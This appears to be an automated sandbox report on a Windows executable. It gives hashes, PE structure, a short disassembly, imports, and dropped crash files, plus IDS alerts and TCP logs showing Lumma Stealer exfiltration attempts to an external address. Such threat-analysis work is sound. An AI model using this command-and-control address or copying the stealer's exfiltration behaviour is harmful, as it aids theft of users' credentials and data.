                                                          SHA-256:3D0ACF7872DE02317460E6A29A279CBEC0D1081FEAA005F06DC48CCB5A3BD31B
                                                          SHA-512:8B22986DB430C3516057A8C51DCD10CC365F92F5AE0289353178C9A8D866DC7B6CF693DA5AAA1BD73246232F7E824B4C1920A1CF4D3F9B8AFFEC7D149851CBD9
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.5.2.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4583
                                                          Entropy (8bit):4.486540606475781
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zscJg77aI9N6WpW8VYGIYm8M4JjAU4YF6p+q8XHFgQ9ppEd:uIjfaI7D77VhlJjp4BuHFhnpEd
                                                          MD5:97CA2FA2989C57592A603DB2DAADDD64
                                                          SHA1:2B15B9C2D7545911805F623F608E1DF42153A82D
                                                          SHA-256:47AFB0F638B26F7A3DA7AF75C0338931AA0C64FC8B25069A44D7A008738E86BF
                                                          SHA-512:CD8008AFD34C47EFE4730BBC487B6FC5FADA25D45F585948D26311FC2A7C0AC6D90C19F22DC9FD91C227ADC04D0855D7F734ECF012452A63E74F3BD70138C581
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586137" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.468524968575776
                                                          Encrypted:false
                                                          SSDEEP:6144:BzZfpi6ceLPx9skLmb0fVZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:ZZHtVZWOKnMM6bFpUj4
                                                          MD5:4BC356D49D1F52B9D9AC732E0E6C99DD
                                                          SHA1:7C74E48579EB0CEBE4B0D1F8C930F3E548BD0E7C
                                                          SHA-256:5B47DF97A1940700F2AC89EC88BFCF73C51EAB612891AE07055EE6E54617314C
                                                          SHA-512:12C58B882CE215910DD848BBCA9BD50F62D624318E4E9428B417CF7518624C627670D0D45CE11DC418E31124EDF7E141E62A980A73A4587DD594A7A2AEA3D7DE
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmbSP..5..............................................................................................................................................................................................................................................................................................................................................v.F0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.283709277617488
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Vd3tOP5WSD.exe
                                                          File size:476'160 bytes
                                                          MD5:d539e0fd4638f335e6ba827c71103e03
                                                          SHA1:8448a6b53a5be38ee721065161d20824368379f2
                                                          SHA256:6b5e8356c9c11bb8018e49bacb31892460073945fb601b61cebdcf838ac6c5f1
                                                          SHA512:c166d6199d5e094ad085dee8b9fc6e4089ab90f475d9860f8beed74d9e3c45c9cf34b32f7239f24b67e5881a8d2a3d695a8f8e8145d815f257d65e81e2b7b90e
                                                          SSDEEP:6144:wdXimPCohrkj2pH46GDqucMdeGmwze3DbCs4UUg+zq+R9vqu3KGPMW29T+G3/maB:wrPLh2mEquDeGWDOs4UUg6PzKGPoFOa
                                                          TLSH:F1A4D01273D19435EA2746715E6AC3F86A2EB8318F556BEB236C4B3F0D712E2D672301
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{p..............l.......l.......l.......b..........Z....l.......l.......l......Rich............PE..L...l..a...................
                                                          Icon Hash:911125294961873e
                                                          Entrypoint:0x40b3ef
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x61D6D96C [Thu Jan 6 11:58:36 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:bdc5b971e9cd1e82f0e317074bf19aac
                                                          Instruction
                                                          call 00007F2264858A06h
                                                          jmp 00007F2264851E0Eh
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          mov eax, dword ptr [ebp+08h]
                                                          xor ecx, ecx
                                                          cmp eax, dword ptr [0041F240h+ecx*8]
                                                          je 00007F2264851F95h
                                                          inc ecx
                                                          cmp ecx, 2Dh
                                                          jc 00007F2264851F73h
                                                          lea ecx, dword ptr [eax-13h]
                                                          cmp ecx, 11h
                                                          jnbe 00007F2264851F90h
                                                          push 0000000Dh
                                                          pop eax
                                                          pop ebp
                                                          ret
                                                          mov eax, dword ptr [0041F244h+ecx*8]
                                                          pop ebp
                                                          ret
                                                          add eax, FFFFFF44h
                                                          push 0000000Eh
                                                          pop ecx
                                                          cmp ecx, eax
                                                          sbb eax, eax
                                                          and eax, ecx
                                                          add eax, 08h
                                                          pop ebp
                                                          ret
                                                          call 00007F22648559C0h
                                                          test eax, eax
                                                          jne 00007F2264851F88h
                                                          mov eax, 0041F3A8h
                                                          ret
                                                          add eax, 08h
                                                          ret
                                                          call 00007F22648559ADh
                                                          test eax, eax
                                                          jne 00007F2264851F88h
                                                          mov eax, 0041F3ACh
                                                          ret
                                                          add eax, 0Ch
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          call 00007F2264851F67h
                                                          mov ecx, dword ptr [ebp+08h]
                                                          push ecx
                                                          mov dword ptr [eax], ecx
                                                          call 00007F2264851F07h
                                                          pop ecx
                                                          mov esi, eax
                                                          call 00007F2264851F41h
                                                          mov dword ptr [eax], esi
                                                          pop esi
                                                          pop ebp
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 4Ch
                                                          mov eax, dword ptr [0041F3DCh]
                                                          xor eax, ebp
                                                          mov dword ptr [ebp-04h], eax
                                                          push ebx
                                                          xor ebx, ebx
                                                          push esi
                                                          mov esi, dword ptr [ebp+08h]
                                                          push edi
                                                          mov dword ptr [ebp-2Ch], ebx
                                                          mov dword ptr [ebp-1Ch], ebx
                                                          mov dword ptr [ebp-20h], ebx
                                                          mov dword ptr [ebp-28h], ebx
                                                          mov dword ptr [ebp-24h], ebx
                                                          mov dword ptr [ebp-4Ch], esi
                                                          mov dword ptr [ebp-48h], ebx
                                                          cmp dword ptr [esi+14h], ebx
                                                          Programming Language:
                                                          • [ASM] VS2010 build 30319
                                                          • [C++] VS2010 build 30319
                                                          • [ C ] VS2010 build 30319
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [RES] VS2010 build 30319
                                                          • [LNK] VS2010 build 30319
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1daf40x3c.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2eb0000xb378.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x45600x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f0.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x1d66e0x1d8001738ce25c4411490407f6ffae6dd6aa6False0.5238512976694916data6.499251735167183IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0x1f0000x2ca9700x4b2008819af21714358a54f70fdf1e93162ddunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .sic0x2ea0000x50x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x2eb0000xb3780xb40088f3de87dcc037eb376dbcb4b2d0c7c3False0.38363715277777777data4.336173517940792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x2eb4f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.49774368231046934
                                                          RT_ICON0x2eb4f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.49774368231046934
                                                          RT_ICON0x2ebd980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5650921658986175
                                                          RT_ICON0x2ebd980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5650921658986175
                                                          RT_ICON0x2ec4600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5635838150289018
                                                          RT_ICON0x2ec4600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5635838150289018
                                                          RT_ICON0x2ec9c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4329268292682927
                                                          RT_ICON0x2ec9c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4329268292682927
                                                          RT_ICON0x2eda700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.41721311475409834
                                                          RT_ICON0x2eda700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.41721311475409834
                                                          RT_ICON0x2ee3f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4512411347517731
                                                          RT_ICON0x2ee3f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4512411347517731
                                                          RT_ICON0x2ee8c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.31663113006396587
                                                          RT_ICON0x2ee8c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.31663113006396587
                                                          RT_ICON0x2ef7680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.3916967509025271
                                                          RT_ICON0x2ef7680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.3916967509025271
                                                          RT_ICON0x2f00100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.4377880184331797
                                                          RT_ICON0x2f00100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.4377880184331797
                                                          RT_ICON0x2f06d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.4190751445086705
                                                          RT_ICON0x2f06d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.4190751445086705
                                                          RT_ICON0x2f0c400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.25570539419087135
                                                          RT_ICON0x2f0c400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.25570539419087135
                                                          RT_ICON0x2f31e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.29080675422138835
                                                          RT_ICON0x2f31e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.29080675422138835
                                                          RT_ICON0x2f42900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.3008196721311475
                                                          RT_ICON0x2f42900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.3008196721311475
                                                          RT_ICON0x2f4c180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.3351063829787234
                                                          RT_ICON0x2f4c180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.3351063829787234
                                                          RT_STRING0x2f53a80x412dataTamilIndia0.45777351247600767
                                                          RT_STRING0x2f53a80x412dataTamilSri Lanka0.45777351247600767
                                                          RT_STRING0x2f57c00x360dataTamilIndia0.48032407407407407
                                                          RT_STRING0x2f57c00x360dataTamilSri Lanka0.48032407407407407
                                                          RT_STRING0x2f5b200x25edataTamilIndia0.4834983498349835
                                                          RT_STRING0x2f5b200x25edataTamilSri Lanka0.4834983498349835
                                                          RT_STRING0x2f5d800x5f6dataTamilIndia0.4351245085190039
                                                          RT_STRING0x2f5d800x5f6dataTamilSri Lanka0.4351245085190039
                                                          RT_ACCELERATOR0x2f50f80x90dataTamilIndia0.6944444444444444
                                                          RT_ACCELERATOR0x2f50f80x90dataTamilSri Lanka0.6944444444444444
                                                          RT_GROUP_ICON0x2ee8600x5adataTamilIndia0.7222222222222222
                                                          RT_GROUP_ICON0x2ee8600x5adataTamilSri Lanka0.7222222222222222
                                                          RT_GROUP_ICON0x2f50800x76dataTamilIndia0.6779661016949152
                                                          RT_GROUP_ICON0x2f50800x76dataTamilSri Lanka0.6779661016949152
                                                          RT_VERSION0x2f51980x20cdata0.5629770992366412
                                                          None0x2f51880xadataTamilIndia1.8
                                                          None0x2f51880xadataTamilSri Lanka1.8
                                                          DLLImport
                                                          KERNEL32.dllFindFirstChangeNotificationW, GetDriveTypeW, GetProfileIntW, GetConsoleAliasExesLengthA, LoadResource, InterlockedIncrement, WaitNamedPipeA, SetComputerNameW, OpenSemaphoreA, FreeEnvironmentStringsA, MoveFileWithProgressA, GetModuleHandleW, GetSystemTimeAsFileTime, EnumTimeFormatsW, SetProcessPriorityBoost, GetVolumePathNameW, GetPrivateProfileIntA, GetPrivateProfileStructW, GetSystemPowerStatus, FreeConsole, GetCalendarInfoA, GetFileAttributesW, WriteConsoleW, lstrcatA, GetShortPathNameA, EnumSystemLocalesA, DeleteFiber, SearchPathW, GetCurrentDirectoryW, GetProcAddress, ResetEvent, LoadLibraryA, WriteConsoleA, GetProcessId, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, FindFirstVolumeMountPointW, SetFileApisToANSI, QueryDosDeviceW, AddAtomA, SetSystemTime, GlobalWire, GetModuleFileNameA, FindNextFileA, CreateIoCompletionPort, GetModuleHandleA, FreeEnvironmentStringsW, CreateMailslotA, EnumDateFormatsW, CompareStringA, TerminateJobObject, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, EnumCalendarInfoExA, EnumSystemLocalesW, GetLastError, GlobalFix, WideCharToMultiByte, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapAlloc, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, LCMapStringW, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetModuleFileNameW, SetFilePointer, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, IsValidLocale, GetConsoleCP, GetConsoleMode, LoadLibraryW, SetStdHandle, FlushFileBuffers, CreateFileW, CloseHandle
                                                          GDI32.dllGetCharABCWidthsA
                                                          Language of compilation systemCountry where language is spokenMap
                                                          TamilIndia
                                                          TamilSri Lanka
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-13T10:51:26.431513+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64985694.158.244.6980TCP
                                                          2024-11-13T10:51:26.431513+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64998894.158.244.6980TCP
                                                          2024-11-13T10:52:13.306691+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.649773TCP
                                                          2024-11-13T10:52:26.013044+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64980594.158.244.6980TCP
                                                          2024-11-13T10:52:44.132548+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64990394.158.244.6980TCP
                                                          2024-11-13T10:52:50.913637+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.649983TCP
                                                          2024-11-13T10:52:53.138051+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64995694.158.244.6980TCP
                                                          2024-11-13T10:53:01.909159+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64998694.158.244.6980TCP
                                                          2024-11-13T10:53:20.128560+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64998994.158.244.6980TCP
                                                          2024-11-13T10:53:20.849421+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999094.158.244.6980TCP
                                                          2024-11-13T10:53:20.849421+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.64999094.158.244.6980TCP
                                                          2024-11-13T10:53:38.222316+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999194.158.244.6980TCP
                                                          2024-11-13T10:53:47.017589+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999394.158.244.6980TCP
                                                          2024-11-13T10:53:56.106852+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999494.158.244.6980TCP
                                                          2024-11-13T10:54:05.000873+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999594.158.244.6980TCP
                                                          2024-11-13T10:54:13.834771+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999694.158.244.6980TCP
                                                          2024-11-13T10:54:22.617838+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.64999794.158.244.6980TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 13, 2024 10:52:17.514739990 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:17.519670963 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.519777060 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:17.520049095 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:17.520529985 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:17.525082111 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525151014 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:17.525407076 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525417089 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525432110 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525441885 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525465012 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:17.525485039 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525495052 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525511026 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525520086 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.525582075 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.530626059 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.530644894 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.530653954 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.530663013 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:17.530672073 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.012854099 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.013044119 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.019064903 CET4980580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.024199009 CET804980594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.637728930 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.642760038 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.642882109 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.642975092 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.643377066 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.648221016 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648325920 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.648379087 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648432016 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648451090 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.648462057 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648494005 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.648526907 CET4985680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:26.648535013 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648565054 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648592949 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648622036 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648649931 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.648679018 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.653419971 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.653454065 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.653556108 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.653584003 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.653697014 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.653724909 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:26.701534033 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:35.136523008 CET804985694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:35.645240068 CET4990380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:35.650624037 CET804990394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:35.650728941 CET4990380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:35.650890112 CET4990380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:35.651307106 CET4990380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:35.655711889 CET804990394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:35.656172037 CET804990394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:44.132391930 CET804990394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:44.132548094 CET4990380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:44.132765055 CET4990380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:44.137588978 CET804990394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:44.644547939 CET4995680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:44.649610043 CET804995694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:44.649729967 CET4995680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:44.649811029 CET4995680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:44.650234938 CET4995680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:44.654589891 CET804995694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:44.655047894 CET804995694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:53.137805939 CET804995694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:53.138051033 CET4995680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:53.138176918 CET4995680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:53.143006086 CET804995694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:53.427455902 CET4998680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:53.432429075 CET804998694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:53.432531118 CET4998680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:53.432670116 CET4998680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:53.433115005 CET4998680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:52:53.437642097 CET804998694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:52:53.437963009 CET804998694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:01.908983946 CET804998694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:01.909158945 CET4998680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.030843019 CET4998680192.168.2.694.158.244.69
